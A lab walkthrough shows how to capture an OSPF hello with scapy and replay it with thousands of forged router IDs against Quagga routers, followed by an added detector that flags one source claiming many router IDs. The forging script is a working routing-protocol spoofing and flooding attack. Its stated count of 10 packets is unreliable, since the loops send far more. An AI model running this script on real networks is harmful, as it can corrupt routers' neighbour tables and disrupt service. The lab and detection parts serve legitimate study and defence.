lost and found ( for me ? )

send OSPF hello packets with scapy

Here’s an explanation of how to send OSPF hello packets with scapy.
I referred to http://blog.egofuzzer.net/2011/04/ospfs-evil-neighbor.html.
Many, many thanks!


        192.168.0.0/24, area 0.0.0.0, no authentication

quagga1 0.254 --------- vSW --------- 0.253 quagga2
                         |
                        0.30
          scapy machine ( sends OSPF hello )


I’ve already configured the OSPF relationship between quagga1 and quagga2.
On the scapy box (Ubuntu 12.04), capture an OSPF hello packet with scapy to use as the basis for a crafted OSPF hello packet.

Sniff an OSPF hello packet.
# scapy
INFO: No IPv6 support in kernel
WARNING: No route found for IPv6 destination :: (no default route?)
Welcome to Scapy (2.2.0)
>>> load_contrib('ospf')

>>> sniff(filter="ip dst 224.0.0.5",count=1)
<Sniffed: TCP:0 UDP:0 ICMP:0 Other:1>

>>> _[0].show()
###[ Ethernet ]###
 dst= 01:00:5e:00:00:05
 src= 52:54:00:d4:ab:3e
 type= 0x800
###[ IP ]###
    version= 4L
    ihl= 5L
    tos= 0xc0
    len= 68
    id= 56607
    flags=
    frag= 0L
    ttl= 1
    proto= ospf
    chksum= 0x39d6
    src= 192.168.0.254 <- quagga1
    dst= 224.0.0.5
    \options\
###[ OSPF Header ]###
       version= 2
       type= Hello
       len= 48
       src= 192.168.1.254
       area= 0.0.0.0
       chksum= 0xf300
       authtype= Null
       authdata= 0x0
###[ OSPF Hello ]###
          mask= 255.255.255.0
          hellointerval= 10
          options= E
          prio= 1
          deadinterval= 40
          router= 192.168.0.253
          backup= 192.168.0.254
          neighbors= ['192.168.2.254']
>>>


Save the above hello packet as a pcap file.
>>> wrpcap("ospf_hello.pcap",_[0])

# tshark -r ospf_hello.pcap -p ospf
Running as user "root" and group "root". This could be dangerous.
 1   0.000000 192.168.0.254 -> 224.0.0.5    OSPF 82 Hello Packet


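This script will send 10 OSPF hello packets.
# cat send_ospf_hello.py
#!/usr/bin/env python
from scapy.all import *

load_contrib('ospf')

# Use the captured hello as a template for the crafted packets.
pkts = rdpcap('ospf_hello.pcap')
h = pkts[0]
for i in range(0, 200):
    for j in range(1, 100):
        # A different router ID (192.168.i.j) for every packet.
        host = "192.168.%s.%s" % (i, j)
        h[IP].src = "192.168.0.30"
        h[IP].chksum = None          # let scapy recompute the IP checksum
        h[OSPF_Hdr].src = host
        h[OSPF_Hdr].chksum = None    # let scapy recompute the OSPF checksum
        h[OSPF_Hello].router = host
        h[OSPF_Hello].backup = "192.168.0.254"
        # The field is named "neighbors" and holds a list.
        h[OSPF_Hello].neighbors = ["192.168.0.254"]
        sendp(h, verbose=1)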


Send the OSPF packets.
# ./send_ospf_hello.py
WARNING: No route found for IPv6 destination :: (no default route?)
.
Sent 1 packets.
<snip>


Before sending crafted OSPF hello packets:
quagga1# show  ip ospf  neighbor

    Neighbor ID Pri State           Dead Time Address         Interface            RXmtL RqstL DBsmL
192.168.2.254     1 Full/DR           35.435s 192.168.0.253   eth0:192.168.0.254       1     0     0
quagga1#


While sending crafted hello packets, quagga1 lists a forged router ID as a neighbor in Init state at address 192.168.0.30:
quagga1# show  ip ospf  neighbor

    Neighbor ID Pri State           Dead Time Address         Interface            RXmtL RqstL DBsmL
192.168.68.78     1 Init/DROther      39.997s 192.168.0.30    eth0:192.168.0.254       0     0     0
192.168.2.254     1 Full/DR           39.250s 192.168.0.253   eth0:192.168.0.254       0     0     0

quagga1# show  ip ospf  neighbor

    Neighbor ID Pri State           Dead Time Address         Interface            RXmtL RqstL DBsmL
192.168.72.10     1 Init/DROther      39.998s 192.168.0.30    eth0:192.168.0.254       0     0     0
192.168.2.254     1 Full/DR           38.442s 192.168.0.253   eth0:192.168.0.254       0     0     0
quagga1#

# tshark -r crafted_ospf.pcap -R '(ip.addr==192.168.0.30)' | head -5
 2   1.779586 192.168.0.30 -> 224.0.0.5    OSPF Hello Packet
 3   1.781786 192.168.0.30 -> 224.0.0.5    OSPF Hello Packet
 4   1.783419 192.168.0.30 -> 224.0.0.5    OSPF Hello Packet
 5   1.785150 192.168.0.30 -> 224.0.0.5    OSPF Hello Packet
 6   1.787003 192.168.0.30 -> 224.0.0.5    OSPF Hello Packet
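
Seen from the defender's side, the neighbor tables above show the signal to look for: a single source address (192.168.0.30) announcing a different router ID in successive hellos. The following is an added example, not part of the original post, that parses raw IPv4/OSPFv2 bytes and reports any source IP that claims more than one router ID. The function names and the sample packets are constructed for illustration.

```python
import socket
import struct
from collections import defaultdict

OSPF_PROTO = 89   # IP protocol number assigned to OSPF
OSPF_HELLO = 1    # OSPF packet type 1 = Hello

def parse_ospf_hello(ip_packet):
    """Return (src_ip, router_id, autype) for an OSPFv2 Hello, else None."""
    if len(ip_packet) < 20 or ip_packet[0] >> 4 != 4 or ip_packet[9] != OSPF_PROTO:
        return None
    ospf = ip_packet[(ip_packet[0] & 0x0F) * 4:]   # skip IP header (IHL words)
    if len(ospf) < 24:                              # fixed OSPF header is 24 bytes
        return None
    version, ptype, _len, rid, _area, _cksum, autype = struct.unpack(
        "!BBH4s4sHH", ospf[:16])
    if version != 2 or ptype != OSPF_HELLO:
        return None
    return socket.inet_ntoa(ip_packet[12:16]), socket.inet_ntoa(rid), autype

def find_router_id_churn(ip_packets, max_ids=1):
    """Return {source IP: router IDs} for sources claiming more than max_ids."""
    seen = defaultdict(set)
    for parsed in filter(None, map(parse_ospf_hello, ip_packets)):
        seen[parsed[0]].add(parsed[1])
    return {src: sorted(ids) for src, ids in seen.items() if len(ids) > max_ids}

def build_hello(src_ip, router_id):
    """Constructed test input: IPv4 + OSPFv2 Hello bytes, checksums left at 0."""
    a = socket.inet_aton
    hello = struct.pack("!4sHBBI4s4s", a("255.255.255.0"), 10, 0x02, 1, 40,
                        a("192.168.0.253"), a("192.168.0.254"))
    ospf = struct.pack("!BBH4s4sHH8s", 2, OSPF_HELLO, 24 + len(hello),
                       a(router_id), a("0.0.0.0"), 0, 0, b"\x00" * 8) + hello
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0xC0, 20 + len(ospf), 0, 0, 1,
                     OSPF_PROTO, 0, a(src_ip), a("224.0.0.5"))
    return ip + ospf

# Constructed sample using the addresses shown in the post's lab output.
SAMPLE = [
    build_hello("192.168.0.254", "192.168.1.254"),   # quagga1
    build_hello("192.168.0.253", "192.168.2.254"),   # quagga2
    build_hello("192.168.0.30", "192.168.68.78"),    # scapy box, forged ID
    build_hello("192.168.0.30", "192.168.72.10"),    # scapy box, another ID
]

if __name__ == "__main__":
    print(find_router_id_churn(SAMPLE))
```

To run it over a real capture, pass bytes(p[IP]) for each packet returned by scapy's rdpcap. The autype value returned by parse_ospf_hello is 0 for Null authentication, which is the lab's "no authentication" setting.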
